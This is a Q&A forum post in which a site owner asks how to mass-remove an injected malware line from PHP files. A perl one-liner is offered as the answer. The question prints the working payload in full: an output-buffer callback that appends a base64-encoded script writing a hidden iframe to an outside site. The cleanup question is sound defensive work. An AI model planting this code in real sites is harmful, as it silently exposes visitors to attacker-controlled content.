I’m trying to do a mass search and replace on all .php files for

Question

0

Asked: June 13, 20262026-06-13T08:32:57+00:00 2026-06-13T08:32:57+00:00

I’m trying to do a mass search and replace on all .php files for

0

I’m trying to do a mass search and replace on all .php files for the following string for malware cleanup:

<?php ob_start("security_update"); function security_update($buffer){return $buffer.base64_decode('PHNjcmlwdD5kb2N1bWVudC53cml0ZSgnPHN0eWxlPi52Yl9zdHlsZV9mb3J1bSB7ZmlsdGVyOiBhbHBoYShvcGFjaXR5PTApO29wYWNpdHk6IDAuMDt3aWR0aDogMjAwcHg7aGVpZ2h0OiAxNTBweDt9PC9zdHlsZT48ZGl2IGNsYXNzPSJ2Yl9zdHlsZV9mb3J1bSI+PGlmcmFtZSBoZWlnaHQ9IjE1MCIgd2lkdGg9IjIwMCIgc3JjPSJodHRwOi8vd3d3Lml3cy1sZWlwemlnLmRlL2NvbnRhY3RzLnBocCI+PC9pZnJhbWU+PC9kaXY+Jyk7PC9zY3JpcHQ+');}

I can delete the entire line via sed '/buffer.base64_decode/d' file.php. However, I still need the opening <?php

So what really needs to be done is a search and replace of buffer.base64_decode for <?php and my brain is all mashed potatoes after a long day in front of this evil computer.

Or maybe I’ve thought myself into a tiny box and am going about this all wrong?

Report

Leave an answer
Cancel reply

You must login to add an answer.

Need An Account,

1 Answer

Editorial Team · Answer 1 · 2026-06-13T08:32:58+00:00

Editorial Team

2026-06-13T08:32:58+00:00Added an answer on June 13, 2026 at 8:32 am

perl -pe 's/<\?php ob_start\("security_update"\);.*?\?>//gsm; s/<\?php ob_start\("security_update"\);.*/<?php/g;' test.php

0

Reply
Share
Share

- Report

Sign Up

Sign In

Forgot Password

The Archive Base Latest Questions

I’m trying to do a mass search and replace on all .php files for

Leave an answerCancel reply

1 Answer

Leave an answer
Cancel reply